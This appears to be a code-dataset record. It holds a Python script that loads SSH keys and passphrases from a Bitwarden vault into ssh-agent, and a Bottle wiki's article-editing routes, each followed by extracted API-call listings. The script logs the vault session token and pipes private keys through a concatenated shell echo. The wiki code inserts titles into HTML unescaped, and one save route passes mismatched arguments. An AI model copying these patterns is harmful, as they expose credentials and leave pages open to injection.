['bw', 'list', 'folders', '--search', foldername, '--session', session],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
folders = json.loads(proc_folders.stdout)
if not folders:
logging.error('"%s" folder not found', foldername)
return None
# Do we have any folders
if len(folders) != 1:
logging.error('%d folders with the name "%s" found', len(folders), foldername)
return None
return folders[0]['id']
def folder_items(session, folder_id):
"""
Function to return items from a folder
"""
logging.debug('Folder ID: %s', folder_id)
proc_items = subprocess.run(
[ 'bw', 'list', 'items', '--folderid', folder_id, '--session', session],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
return json.loads(proc_items.stdout)
def add_ssh_keys(session, items, keyname):
"""
Function to attempt to get keys from a vault item
"""
for item in items:
try:
private_key_file = [k['value'] for k in item['fields']
if k['name'] == keyname and k['type'] == 0][0]
except IndexError:
logging.warning('No "%s" field found for item %s', keyname, item['name'])
continue
except KeyError as e:
logging.debug('No key "%s" found in item %s - skipping', e.args[0], item['name'])
continue
logging.debug('Private key file declared')
try:
private_key_id = [k['id'] for k in item['attachments']
if k['fileName'] == private_key_file][0]
except IndexError:
logging.warning(
'No attachment called "%s" found for item %s',
private_key_file,
item['name']
)
continue
logging.debug('Private key ID found')
try:
logging.debug('trying to add key ' + item['name'])
ssh_add(session, item['id'], private_key_id, item['name'])
except subprocess.SubprocessError:
logging.warning('Could not add key to the SSH agent')
def ssh_add(session, item_id, key_id, key_name):
"""
Function to get the key contents from the Bitwarden vault
"""
logging.debug('Item ID: %s', item_id)
logging.debug('Key ID: %s', key_id)
proc_passphrase = subprocess.run([
'bw',
'get',
'item', item_id,
'--session', session
],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
temp_passphrase = json.loads(proc_passphrase.stdout)
for field in temp_passphrase['fields']:
if field['name'] == 'passphrase':
passphrase = field['value']
proc_attachment = subprocess.run([
'bw',
'get',
'attachment', key_id,
'--itemid', item_id,
'--raw',
'--session', session
],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
ssh_key = proc_attachment.stdout
logging.debug("Running ssh-add")
cmd = ' echo "' + ssh_key + ' " | ssh-add -'
child = pexpect.spawn('sh', env=dict(os.environ, SSH_ASKPASS_REQUIRE="never"), echo=False)
child.sendline('stty -icanon')
# https://unix.stackexchange.com/questions/611355/does-zsh-use-canonical-mode-for-the-terminal
# https://github.com/pexpect/pexpect/issues/55
# https://pexpect.readthedocs.io/en/stable/api/pexpect.html (send, PC_MAX_CANON)
# i'm using macOS with zsh as my loginshell, just works
time.sleep(0.2)
cmdlines = cmd.splitlines()
for item in cmdlines:
child.sendline(item)
time.sleep(0.2)
index = child.expect(['Enter passphrase for.*', '.*dentity added:.*', pexpect.TIMEOUT, pexpect.EOF], timeout=2)
if index == 0:
logging.debug('Entering passphrase...')
child.waitnoecho()
child.sendline(passphrase)
child.waitnoecho()
passphraseindex = child.expect([pexpect.TIMEOUT, pexpect.EOF, '.*dentity added:.*', '.*ad passphrase, try again for.*'], timeout=2)
if passphraseindex == 0:
logging.debug('Passphrase timeout')
if passphraseindex == 1:
logging.debug('EOF?')
if passphraseindex == 2:
logging.info('Identity ' + key_name + ' added')
if passphraseindex == 3:
logging.error('Wrong passphrase, skipping...')
if index == 1:
logging.info('Identity ' + key_name + ' added, no passphrase needed')
if index == 2:
logging.error('Timeout')
if index == 3:
logging.debug('EOF?')
child.close()
cmd = None
passphrase = None
if __name__ == '__main__':
def parse_args():
"""
Function to parse command line arguments
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'-d', '--debug',
action='store_true',
help='show debug output',
)
parser.add_argument(
'-f', '--foldername',
default='ssh-agent',
help='folder name to use to search for SSH keys',
)
parser.add_argument(
'-c', '--customfield',
default='private',
help='custom field name where private key filename is stored',
)
return parser.parse_args()
def main():
"""
Main program logic
"""
args = parse_args()
if args.debug:
loglevel = logging.DEBUG
else:
loglevel = logging.INFO
logging.basicConfig(level=loglevel)
try:
logging.info('Getting Bitwarden session')
session = get_session()
logging.debug('Session = %s', session)
logging.info('Getting folder list')
folder_id = get_folders(session, args.foldername)
logging.info('Getting folder items')
items = folder_items(session, folder_id)
logging.info('Attempting to add keys to ssh-agent')
add_ssh_keys(session, items, args.customfield)
except subprocess.CalledProcessError as e:
if e.stderr:
logging.error('`%s` error: %s', e.cmd[0], e.stderr)
logging.debug('Error running %s', e.cmd)
main()
| [
"logging.basicConfig",
"json.loads",
"logging.debug",
"argparse.ArgumentParser",
"subprocess.run",
"os.environ.get",
"logging.info",
"time.sleep",
"logging.warning",
"pkg_resources.parse_version",
"logging.error"
] | [((652, 752), 'subprocess.run', 'subprocess.run', (["['bw', '--version']"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', '--version'], stdout=subprocess.PIPE,\n universal_newlines=True, check=True)\n", (666, 752), False, 'import subprocess\n'), ((1281, 1309), 'os.environ.get', 'os.environ.get', (['"""BW_SESSION"""'], {}), "('BW_SESSION')\n", (1295, 1309), False, 'import os\n'), ((1477, 1530), 'subprocess.run', 'subprocess.run', (["['bw', 'login', '--check', '--quiet']"], {}), "(['bw', 'login', '--check', '--quiet'])\n", (1491, 1530), False, 'import subprocess\n'), ((1752, 1859), 'subprocess.run', 'subprocess.run', (["['bw', '--raw', operation]"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', '--raw', operation], stdout=subprocess.PIPE,\n universal_newlines=True, check=True)\n", (1766, 1859), False, 'import subprocess\n'), ((2062, 2106), 'logging.debug', 'logging.debug', (['"""Folder name: %s"""', 'foldername'], {}), "('Folder name: %s', foldername)\n", (2075, 2106), False, 'import logging\n'), ((2127, 2283), 'subprocess.run', 'subprocess.run', (["['bw', 'list', 'folders', '--search', foldername, '--session', session]"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', 'list', 'folders', '--search', foldername,\n '--session', session], stdout=subprocess.PIPE, universal_newlines=True,\n check=True)\n", (2141, 2283), False, 'import subprocess\n'), ((2330, 2361), 'json.loads', 'json.loads', (['proc_folders.stdout'], {}), '(proc_folders.stdout)\n', (2340, 2361), False, 'import json\n'), ((2757, 2798), 'logging.debug', 'logging.debug', (['"""Folder ID: %s"""', 'folder_id'], {}), "('Folder ID: %s', folder_id)\n", (2770, 2798), False, 'import logging\n'), ((2817, 2968), 'subprocess.run', 'subprocess.run', (["['bw', 'list', 'items', '--folderid', folder_id, '--session', session]"], {'stdout': 'subprocess.PIPE', 'universal_newlines': 
'(True)', 'check': '(True)'}), "(['bw', 'list', 'items', '--folderid', folder_id, '--session',\n session], stdout=subprocess.PIPE, universal_newlines=True, check=True)\n", (2831, 2968), False, 'import subprocess\n'), ((3016, 3045), 'json.loads', 'json.loads', (['proc_items.stdout'], {}), '(proc_items.stdout)\n', (3026, 3045), False, 'import json\n'), ((4478, 4515), 'logging.debug', 'logging.debug', (['"""Item ID: %s"""', 'item_id'], {}), "('Item ID: %s', item_id)\n", (4491, 4515), False, 'import logging\n'), ((4520, 4555), 'logging.debug', 'logging.debug', (['"""Key ID: %s"""', 'key_id'], {}), "('Key ID: %s', key_id)\n", (4533, 4555), False, 'import logging\n'), ((4579, 4713), 'subprocess.run', 'subprocess.run', (["['bw', 'get', 'item', item_id, '--session', session]"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', 'get', 'item', item_id, '--session', session], stdout\n =subprocess.PIPE, universal_newlines=True, check=True)\n", (4593, 4713), False, 'import subprocess\n'), ((4804, 4838), 'json.loads', 'json.loads', (['proc_passphrase.stdout'], {}), '(proc_passphrase.stdout)\n', (4814, 4838), False, 'import json\n'), ((4993, 5165), 'subprocess.run', 'subprocess.run', (["['bw', 'get', 'attachment', key_id, '--itemid', item_id, '--raw',\n '--session', session]"], {'stdout': 'subprocess.PIPE', 'universal_newlines': '(True)', 'check': '(True)'}), "(['bw', 'get', 'attachment', key_id, '--itemid', item_id,\n '--raw', '--session', session], stdout=subprocess.PIPE,\n universal_newlines=True, check=True)\n", (5007, 5165), False, 'import subprocess\n'), ((5312, 5344), 'logging.debug', 'logging.debug', (['"""Running ssh-add"""'], {}), "('Running ssh-add')\n", (5325, 5344), False, 'import logging\n'), ((5828, 5843), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (5838, 5843), False, 'import time\n'), ((5945, 5960), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (5955, 5960), False, 'import time\n'), ((1346, 1395), 
'logging.debug', 'logging.debug', (['"""Existing Bitwarden session found"""'], {}), "('Existing Bitwarden session found')\n", (1359, 1395), False, 'import logging\n'), ((1571, 1613), 'logging.debug', 'logging.debug', (['"""Not logged into Bitwarden"""'], {}), "('Not logged into Bitwarden')\n", (1584, 1613), False, 'import logging\n'), ((1660, 1702), 'logging.debug', 'logging.debug', (['"""Bitwarden vault is locked"""'], {}), "('Bitwarden vault is locked')\n", (1673, 1702), False, 'import logging\n'), ((2391, 2441), 'logging.error', 'logging.error', (['""""%s" folder not found"""', 'foldername'], {}), '(\'"%s" folder not found\', foldername)\n', (2404, 2441), False, 'import logging\n'), ((3630, 3672), 'logging.debug', 'logging.debug', (['"""Private key file declared"""'], {}), "('Private key file declared')\n", (3643, 3672), False, 'import logging\n'), ((4050, 4087), 'logging.debug', 'logging.debug', (['"""Private key ID found"""'], {}), "('Private key ID found')\n", (4063, 4087), False, 'import logging\n'), ((6105, 6144), 'logging.debug', 'logging.debug', (['"""Entering passphrase..."""'], {}), "('Entering passphrase...')\n", (6118, 6144), False, 'import logging\n'), ((6739, 6808), 'logging.info', 'logging.info', (["('Identity ' + key_name + ' added, no passphrase needed')"], {}), "('Identity ' + key_name + ' added, no passphrase needed')\n", (6751, 6808), False, 'import logging\n'), ((6836, 6860), 'logging.error', 'logging.error', (['"""Timeout"""'], {}), "('Timeout')\n", (6849, 6860), False, 'import logging\n'), ((6888, 6909), 'logging.debug', 'logging.debug', (['"""EOF?"""'], {}), "('EOF?')\n", (6901, 6909), False, 'import logging\n'), ((7109, 7134), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (7132, 7134), False, 'import argparse\n'), ((7876, 7911), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'loglevel'}), '(level=loglevel)\n', (7895, 7911), False, 'import logging\n'), ((1059, 1081), 'pkg_resources.parse_version', 
'parse_version', (['"""1.9.0"""'], {}), "('1.9.0')\n", (1072, 1081), False, 'from pkg_resources import parse_version\n'), ((4114, 4164), 'logging.debug', 'logging.debug', (["('trying to add key ' + item['name'])"], {}), "('trying to add key ' + item['name'])\n", (4127, 4164), False, 'import logging\n'), ((6420, 6455), 'logging.debug', 'logging.debug', (['"""Passphrase timeout"""'], {}), "('Passphrase timeout')\n", (6433, 6455), False, 'import logging\n'), ((6501, 6522), 'logging.debug', 'logging.debug', (['"""EOF?"""'], {}), "('EOF?')\n", (6514, 6522), False, 'import logging\n'), ((6568, 6615), 'logging.info', 'logging.info', (["('Identity ' + key_name + ' added')"], {}), "('Identity ' + key_name + ' added')\n", (6580, 6615), False, 'import logging\n'), ((6661, 6707), 'logging.error', 'logging.error', (['"""Wrong passphrase, skipping..."""'], {}), "('Wrong passphrase, skipping...')\n", (6674, 6707), False, 'import logging\n'), ((7938, 7979), 'logging.info', 'logging.info', (['"""Getting Bitwarden session"""'], {}), "('Getting Bitwarden session')\n", (7950, 7979), False, 'import logging\n'), ((8028, 8066), 'logging.debug', 'logging.debug', (['"""Session = %s"""', 'session'], {}), "('Session = %s', session)\n", (8041, 8066), False, 'import logging\n'), ((8080, 8115), 'logging.info', 'logging.info', (['"""Getting folder list"""'], {}), "('Getting folder list')\n", (8092, 8115), False, 'import logging\n'), ((8191, 8227), 'logging.info', 'logging.info', (['"""Getting folder items"""'], {}), "('Getting folder items')\n", (8203, 8227), False, 'import logging\n'), ((8294, 8345), 'logging.info', 'logging.info', (['"""Attempting to add keys to ssh-agent"""'], {}), "('Attempting to add keys to ssh-agent')\n", (8306, 8345), False, 'import logging\n'), ((3382, 3455), 'logging.warning', 'logging.warning', (['"""No "%s" field found for item %s"""', 'keyname', "item['name']"], {}), '(\'No "%s" field found for item %s\', keyname, item[\'name\'])\n', (3397, 3455), False, 'import 
logging\n'), ((3519, 3605), 'logging.debug', 'logging.debug', (['"""No key "%s" found in item %s - skipping"""', 'e.args[0]', "item['name']"], {}), '(\'No key "%s" found in item %s - skipping\', e.args[0], item[\n \'name\'])\n', (3532, 3605), False, 'import logging\n'), ((3864, 3962), 'logging.warning', 'logging.warning', (['"""No attachment called "%s" found for item %s"""', 'private_key_file', "item['name']"], {}), '(\'No attachment called "%s" found for item %s\',\n private_key_file, item[\'name\'])\n', (3879, 3962), False, 'import logging\n'), ((4291, 4344), 'logging.warning', 'logging.warning', (['"""Could not add key to the SSH agent"""'], {}), "('Could not add key to the SSH agent')\n", (4306, 4344), False, 'import logging\n'), ((8561, 8601), 'logging.debug', 'logging.debug', (['"""Error running %s"""', 'e.cmd'], {}), "('Error running %s', e.cmd)\n", (8574, 8601), False, 'import logging\n'), ((8497, 8548), 'logging.error', 'logging.error', (['"""`%s` error: %s"""', 'e.cmd[0]', 'e.stderr'], {}), "('`%s` error: %s', e.cmd[0], e.stderr)\n", (8510, 8548), False, 'import logging\n')] |
from bottle import (
template,
route,
redirect,
request,
)
from models import (
Article,
ArticleLinks,
Wiki,
Author,
Tag,
Metadata,
)
from peewee import SQL
from .decorators import *
from .wiki import wiki_home
from .media import image_search
from utils import Message, Error, Unsafe
import datetime
@route(f"{Wiki.PATH}/article")
@wiki_env
def articles(wiki: Wiki, user: Author):
return wiki_home(wiki, user)
@route(f"{Wiki.PATH}{Article.PATH}")
@article_env
def article_display_(wiki: Wiki, user: Author, article: Article):
return article_display(wiki, user, article)
def new_article_from_form_core(wiki: Wiki, user: Author, form: str, title: str):
form_article = wiki.articles.where(Article.title == wiki.url_to_title(form)).get()
new_article = form_article.make_from_form(wiki.url_to_title(title))
return redirect(new_article.edit_link)
@route(f"{Wiki.PATH}/new_from_form/<form>")
@wiki_env
def article_new_from_form(wiki: Wiki, user: Author, form: str):
return new_article_from_form_core(wiki, user, form, "Untitled")
@route(f"{Wiki.PATH}/new_from_form/<form>/<title>")
@wiki_env
def article_new_from_form_with_title(wiki: Wiki, user: Author, form: str, title: str):
return new_article_from_form_core(wiki, user, form, title)
@route(f"{Wiki.PATH}{Article.PATH}/revision/<revision_id>")
@article_env
def article_revision(wiki: Wiki, user: Author, article: Article, revision_id: str):
try:
revision = article.revisions.where(Article.id == int(revision_id)).get()
except Exception:
return wiki_home(wiki, user)
return template(
"article.tpl",
articles=[revision],
page_title=f"{revision.title} ({wiki.title})",
wiki=wiki,
)
@route(f"{Wiki.PATH}{Article.PATH}/history")
@article_env
def article_history(wiki: Wiki, user: Author, article: Article):
return template(
"article_history.tpl",
article=article,
page_title=f"History: {article.title} ({wiki.title})",
wiki=wiki,
)
@route(f"{Wiki.PATH}{Article.PATH}/preview", method=("GET", "POST"))
@article_env
def article_preview(wiki: Wiki, user: Author, article: Article):
if request.method == "POST":
article = Article(
title=request.forms.article_title, content=request.forms.article_content,
)
if article.id is None:
article.content = f'This article does not exist. Click the <a class="autogenerate" href="{article.edit_link}">edit link</a> to create this article.'
return template(
"includes/article_core.tpl",
article=article,
page_title=article.title,
wiki=wiki,
style=wiki.stylesheet(),
)
@route(f"{Wiki.PATH}{Article.PATH}/save", method="POST")
def article_save_ajax(wiki_title: str, article_title: str):
return article_edit(wiki_title, article_title, ajax=True)
@route(f"{Wiki.PATH}{Article.PATH}/edit", method=("GET", "POST"))
@article_env
def article_edit(wiki: Wiki, user: Author, article: Article, ajax=False):
# Redirect to article creation if we try to edit a nonexistent article
if article.id is None:
return redirect(f"{wiki.link}/new?title={Wiki.title_to_url(article.title)}")
# Redirect to edit link if we visit the draft of the article
if request.method == "GET":
if article.draft_of:
return redirect(article.draft_of.edit_link)
error = None
warning = None
# Create draft if it doesn't exist
if article.id is not None and not article.draft_of:
if article.drafts.count():
article = article.drafts.get()
else:
# TODO: check for name collisions
draft = Article(
wiki=article.wiki,
title=f"Draft: {article.title}",
content=article.content,
author=article.author,
created=article.created,
draft_of=article,
)
draft.save()
draft.update_links()
draft.update_autogen_metadata()
draft.copy_tags_from(article)
draft.copy_metadata_from(article)
article = draft
wiki.invalidate_cache()
original_article = article
original_id = article.id
# Check if article opened in edit mode without being formally closed out
if request.method == "GET":
if article.opened_by is None:
article.opened_by = article.author
article.last_edited = datetime.datetime.now()
article.save()
else:
warning = Message(
"This article was previously opened for editing without being saved. It may contain unsaved changes elsewhere. Use 'Save and Exit' or 'Quit Editing' to remove this message."
)
if request.method == "POST" or ajax is True:
action = request.forms.save
if action == "quit":
article.opened_by = None
article.save()
article.update_index()
article.update_autogen_metadata()
article.update_links()
wiki.invalidate_cache()
return redirect(article.link)
elif action == "discard":
wiki.invalidate_cache()
return redirect(article.discard_draft_link)
article_content = request.forms.article_content
article_title = request.forms.article_title
if article_content != article.content:
article.content = article_content
article.last_edited = datetime.datetime.now()
renamed = False
if article.new_title is None:
if article_title != article.draft_of.title:
article.new_title = article_title
renamed = True
else:
if article_title != article.new_title:
article.new_title = article_title
renamed = True
if renamed:
if article.has_new_name_collision():
error = Error(
f'An article named "{Unsafe(article_title)}" already exists. Choose another name for this article.'
)
if error is None:
article.save()
article.update_index()
article.update_links()
article.update_autogen_metadata()
wiki.invalidate_cache()
if action == "exit":
article.opened_by = None
article.save()
return redirect(article.link)
elif action in {"publish", "revise"}:
new_article = article.draft_of
if action == "revise":
new_article.make_revision()
if article.new_title:
new_article.title = article.new_title
# Check for rename options here
new_article.content = article.content
new_article.last_edited = article.last_edited
new_article.save()
new_article.update_index()
new_article.update_links()
new_article.clear_metadata()
new_article.update_autogen_metadata()
new_article.copy_metadata_from(article)
new_article.clear_tags()
new_article.copy_tags_from(article)
article.delete_()
return redirect(new_article.link)
elif action == "save":
article.opened_by = None
article.save()
if article.draft_of:
return redirect(article.draft_of.edit_link)
return redirect(article.link)
else:
original_article = Article.get(Article.id == article.id)
if ajax:
if error:
return str(error)
return str(Message("Article successfully saved.", color="success"))
article.content = article.content.replace("&", "&")
return template(
"article_edit.tpl",
article=article,
page_title=f"Editing: {article.title} ({wiki.title})",
wiki=wiki,
original_article=original_article,
messages=[error, warning],
has_error="true" if error else "false",
style=wiki.stylesheet(),
)
@route(f"{Wiki.PATH}{Article.PATH}/delete")
@article_env
def article_delete(wiki: Wiki, user: Author, article: Article):
warning = f'Article "{Unsafe(article.title)}" is going to be deleted! Deleted articles are GONE FOREVER.'
if article.revision_of:
warning += "<hr/>This is an earlier revision of an existing article. Deleting this will remove it from that article's revision history. This is allowed, but NOT RECOMMENDED."
return template(
"article.tpl",
articles=[article],
page_title=f"Delete: {article.title} ({wiki.title})",
wiki=wiki,
messages=[Message(warning, yes=article.delete_confirm_link, no=article.link,)],
)
@route(f"{Wiki.PATH}{Article.PATH}/delete/<delete_key>")
@article_env
def article_delete_confirm(
wiki: Wiki, user: Author, article: Article, delete_key: str, redirect_to=None,
):
if article.id is None:
return redirect(wiki.link)
if article.delete_key != delete_key:
return redirect(article.link)
# TODO: this stuff should be in the delete_instance method
ArticleLinks.update(link=article.title, valid_link=None).where(
ArticleLinks.valid_link == article
).execute()
if article.drafts.count():
draft = article.drafts.get()
draft.delete_()
for revision in article.revisions.select():
revision.delete_()
article.delete_()
# TODO: Move tag-clearing / orphan-check operations to override of delete_instance for article?
wiki.invalidate_cache()
if redirect_to is None:
redirect_to = wiki.main_article
return template(
"article.tpl",
wiki=wiki,
articles=[redirect_to],
messages=[Error(f'Article "{Unsafe(article.title)}" has been deleted.')],
)
@route(f"{Wiki.PATH}{Article.PATH}/discard-draft")
@article_env
def draft_discard(wiki: Wiki, user: Author, article: Article):
if article.id is None:
return redirect(article.link)
if article.draft_of is None:
return redirect(article.link)
warning = f'"{Unsafe(article.title)}" is going to be discarded.'
if article.content != article.draft_of.content:
warning += (
"<br/>THIS DRAFT HAS MODIFICATIONS THAT WERE NOT SAVED TO THE ARTICLE."
)
return template(
"article.tpl",
articles=[article],
page_title=f"Discard draft: {article.title} ({wiki.title})",
wiki=wiki,
messages=[
Message(warning, yes=article.discard_draft_confirm_link, no=article.link,)
],
)
@route(f"{Wiki.PATH}{Article.PATH}/discard-draft/<delete_key>")
@article_env
def draft_discard_confirm(
wiki: Wiki, user: Author, article: Article, delete_key: str,
):
return article_delete_confirm.__wrapped__(
wiki, user, article, delete_key, redirect_to=article.draft_of
)
@route(f"{Wiki.PATH}{Article.PATH}/insert-image")
@article_env
def modal_insert_image(wiki: Wiki, user: Author, article: Article):
return template(
"includes/modal.tpl",
title="Insert image into article",
body=template(
"includes/modal_search.tpl",
url=f"{article.link}/insert-image",
search_results=image_search(wiki, None),
),
footer="",
)
@route(f"{Wiki.PATH}{Article.PATH}/insert-image", method="POST")
@article_env
def modal_insert_image_search(wiki: Wiki, user: Author, article: Article):
search = request.forms.search_query
return image_search(wiki, search)
def existing_tags(article):
taglist = [""]
for tag in article.tags_alpha:
taglist.append(
f'<a href="#" onclick="removeTag(this)"; title="Click to remove this tag from this article" class="badge badge-primary">{tag.title}</a> '
)
tags = "".join(taglist)
return tags
def search_results(wiki, search):
if search is None or search == "":
search_results = (
wiki.tags.select().order_by(SQL("title COLLATE NOCASE")).limit(100)
)
else:
search_results = (
wiki.tags.select()
.where(Tag.title.contains(search))
.order_by(SQL("title COLLATE NOCASE"))
.limit(10)
)
results = ["<ul>"]
for result in search_results:
results.append(
f'<li><a href="#" onclick="insertTag(this);">{result.title}</li>'
)
results.append("</ul>")
return "".join(results)
@route(f"{Wiki.PATH}{Article.PATH}/insert-tag")
@article_env
def modal_tags(wiki: Wiki, user: Author, article: Article):
tags = existing_tags(article)
body = template(
"includes/modal_tag_search.tpl",
url=f"{article.link}/insert-tag",
search_results=search_results(wiki, None),
)
return template(
"includes/modal.tpl",
title="Edit article tags",
body=f'Existing tags (click to remove):<br/><div id="modal-tag-listing">{tags}</div><hr/>{body}',
footer="",
)
@route(f"{Wiki.PATH}{Article.PATH}/insert-tag", method="POST")
@article_env
def modal_tags_search(wiki: Wiki, user: Author, article: Article):
search = request.forms.search_query
return search_results(wiki, search)
@route(f"{Wiki.PATH}{Article.PATH}/add-tag", method="POST")
@article_env
def modal_add_tag(wiki: Wiki, user: Author, article: Article):
tag = request.forms.tag
article.add_tag(tag)
wiki.invalidate_cache()
return existing_tags(article)
@route(f"{Wiki.PATH}{Article.PATH}/remove-tag", method="POST")
@article_env
def modal_remove_tag(wiki: Wiki, user: Author, article: Article):
tag = request.forms.tag
article.remove_tag(tag)
wiki.invalidate_cache()
return existing_tags(article)
@route(f"{Wiki.PATH}{Article.PATH}/edit-metadata")
@article_env
def modal_edit_metadata(wiki: Wiki, user: Author, article: Article):
return template(
"includes/modal.tpl",
title="Edit article metadata",
body=template(
"includes/modal_metadata.tpl",
url=f"{article.link}/edit-metadata",
article=article,
),
footer="",
)
@route(f"{Wiki.PATH}{Article.PATH}/edit-metadata", method="POST")
@article_env
def modal_edit_metadata_post(wiki: Wiki, user: Author, article: Article):
key = request.forms.key
if key:
value = request.forms.value
article.set_metadata(key, value)
delete = request.forms.delete
if delete:
try:
delete_instance = article.metadata.where(Metadata.id == delete).get()
delete_instance.delete_instance()
except Metadata.DoesNotExist:
pass
return template(
"includes/modal_metadata.tpl",
url=f"{article.link}/edit-metadata",
article=article,
)
def link_search(wiki, search):
search_results = wiki.articles.select().where(
Article.draft_of.is_null(), Article.revision_of.is_null()
)
if search:
search_results = search_results.where(Article.title.contains(search))
search_results = search_results.order_by(SQL("title COLLATE NOCASE")).limit(10)
results = ['<ul class="list-unstyled">']
for result in search_results:
link = f'<li><a onclick="insertLinkFromList(this);" href="#">{result.title}</a></li>'
results.append(link)
return "".join(results)
@route(f"{Wiki.PATH}{Article.PATH}/insert-link")
@article_env
def modal_insert_link_search(wiki: Wiki, user: Author, article: Article):
return template(
"includes/modal.tpl",
title="Insert link into article",
body=template(
"includes/modal_search.tpl",
url=f"{article.link}/insert-link",
search_results=link_search(wiki, None),
alt_input=("Text for link", "link_text"),
),
footer="",
)
@route(f"{Wiki.PATH}{Article.PATH}/insert-link", method="POST")
@article_env
def modal_insert_link_search_post(wiki: Wiki, user: Author, article: Article):
search = request.forms.search_query
return link_search(wiki, search)
| [
"models.Article.title.contains",
"bottle.template",
"models.Article.revision_of.is_null",
"peewee.SQL",
"models.Article",
"models.ArticleLinks.update",
"bottle.route",
"models.Wiki.title_to_url",
"datetime.datetime.now",
"models.Tag.title.contains",
"utils.Unsafe",
"models.Article.get",
"uti... | [((348, 377), 'bottle.route', 'route', (['f"""{Wiki.PATH}/article"""'], {}), "(f'{Wiki.PATH}/article')\n", (353, 377), False, 'from bottle import template, route, redirect, request\n'), ((464, 499), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}"""'], {}), "(f'{Wiki.PATH}{Article.PATH}')\n", (469, 499), False, 'from bottle import template, route, redirect, request\n'), ((916, 958), 'bottle.route', 'route', (['f"""{Wiki.PATH}/new_from_form/<form>"""'], {}), "(f'{Wiki.PATH}/new_from_form/<form>')\n", (921, 958), False, 'from bottle import template, route, redirect, request\n'), ((1104, 1154), 'bottle.route', 'route', (['f"""{Wiki.PATH}/new_from_form/<form>/<title>"""'], {}), "(f'{Wiki.PATH}/new_from_form/<form>/<title>')\n", (1109, 1154), False, 'from bottle import template, route, redirect, request\n'), ((1318, 1376), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/revision/<revision_id>"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/revision/<revision_id>')\n", (1323, 1376), False, 'from bottle import template, route, redirect, request\n'), ((1781, 1824), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/history"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/history')\n", (1786, 1824), False, 'from bottle import template, route, redirect, request\n'), ((2071, 2138), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/preview"""'], {'method': "('GET', 'POST')"}), "(f'{Wiki.PATH}{Article.PATH}/preview', method=('GET', 'POST'))\n", (2076, 2138), False, 'from bottle import template, route, redirect, request\n'), ((2738, 2793), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/save"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/save', method='POST')\n", (2743, 2793), False, 'from bottle import template, route, redirect, request\n'), ((2919, 2983), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/edit"""'], {'method': "('GET', 'POST')"}), "(f'{Wiki.PATH}{Article.PATH}/edit', method=('GET', 'POST'))\n", 
(2924, 2983), False, 'from bottle import template, route, redirect, request\n'), ((8323, 8365), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/delete"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/delete')\n", (8328, 8365), False, 'from bottle import template, route, redirect, request\n'), ((9017, 9072), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/delete/<delete_key>"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/delete/<delete_key>')\n", (9022, 9072), False, 'from bottle import template, route, redirect, request\n'), ((10110, 10159), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/discard-draft"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/discard-draft')\n", (10115, 10159), False, 'from bottle import template, route, redirect, request\n'), ((10900, 10962), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/discard-draft/<delete_key>"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/discard-draft/<delete_key>')\n", (10905, 10962), False, 'from bottle import template, route, redirect, request\n'), ((11197, 11245), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-image"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/insert-image')\n", (11202, 11245), False, 'from bottle import template, route, redirect, request\n'), ((11626, 11689), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-image"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/insert-image', method='POST')\n", (11631, 11689), False, 'from bottle import template, route, redirect, request\n'), ((12788, 12834), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-tag"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/insert-tag')\n", (12793, 12834), False, 'from bottle import template, route, redirect, request\n'), ((13324, 13385), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-tag"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/insert-tag', method='POST')\n", (13329, 13385), False, 'from bottle import template, route, 
